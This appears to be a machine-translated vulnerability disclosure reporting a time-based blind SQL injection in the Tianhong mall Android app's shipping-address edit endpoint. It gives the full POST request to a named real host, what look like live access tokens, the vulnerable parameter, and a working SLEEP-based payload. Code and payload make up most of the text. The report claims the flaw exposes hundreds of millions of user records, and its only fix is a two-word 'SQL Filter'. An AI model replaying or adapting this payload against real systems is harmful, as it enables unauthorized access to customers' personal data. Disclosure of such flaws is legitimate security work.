A SQL injection in the APP of Tianhong mall needs to filter the SQL statements (reproduce user data)
RT
The latest version of Tianhong mall app 2.0.4
The shipping address modification function has SQL injection. Parameter: delivery_address_id
POST /center/delivery_address/edit HTTP/1.1x-http-interface-v: 1.0.0x-http-package: cn.rainbow.westorex-http-devicetype: androidx-http-token: abcfd78b4f39cc4d1467731907e3755cx-http-version: 2.0.4x-http-timestamp: 1459129516x-http-deviceuid: ffffffff-a95e-e042-5fcb-c4e600000000Content-Type: application/x-www-form-urlencoded; charset=UTF-8User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.1; MI 2 MIUI/4.12.5)Host: member.honglingjin.cnConnection: Keep-AliveAccept-Encoding: gzipContent-Length: 449detail_address=11%E5%8F%B7&province_code=31345&area_code=100005&street=%E5%8D%97%E5%B1%B1%E8%A1%97%E9%81%93%E6%97%B6%E4%BB%A3%E9%AA%84%E5%AD%90&city=%E6%B7%B1%E5%9C%B3&store_code=00110&area=%E5%8D%97%E5%B1%B1%E5%8C%BA&consignee_name=%E4%BD%99%E7%94%9F&delivery_address_id=4996&province=%E5%B9%BF%E4%B8%9C%E7%9C%81&mobile_phone_number=13500000000&user_id=25000131900&city_code=31359&street_code=10000122&access_token=41128f3f23657fc460a6079faab54e70&
Parameter: delivery_address_id (POST)
Type: AND/OR time-based blind
Title: MySQL> = 5.0.12 AND time-based blind (SELECT)
Payload: detail_address = 11% E5 % 8F % B7 & province_code = 31345 & area_code = 100005 & street = % E5 % 8D % 97% E5 % B1 % B1 % E8 % A1 % 97% E9 % 81% 93% e6 % 97% B6 % E4 % BB % A3 % E9 % AA % 84% E5 % AD % 90 & city = % E6 % B7 % B1 % E5 % 9C % B3 & store_code = 00110 & area = % E5 % 8D % 97% E5 % B1 % B1 % E5 % 8C % BA & consignee_name = % E4 % BD % 99% E7 % 94% 9F & delivery_address_id = 4996 AND (SELECT * FROM (SELECT (SLEEP (5 ))) NESU) & province = % E5 % B9 % BF % E4 % B8 % 9C % E7 % 9C % 81 & mobile_phone_number = 13500000000 & user_id = 25000131900 & city_code = 31359 & street_code = 10000122 & access_token = 41128f3f23657fc460a6079faab54e70 &
Without running so much data, view WooYun: a SQL injection (containing 380 million + mall user data and 330 million + VIP user data) in the Tianhong mall APP is the same.
Solution:
SQL Filter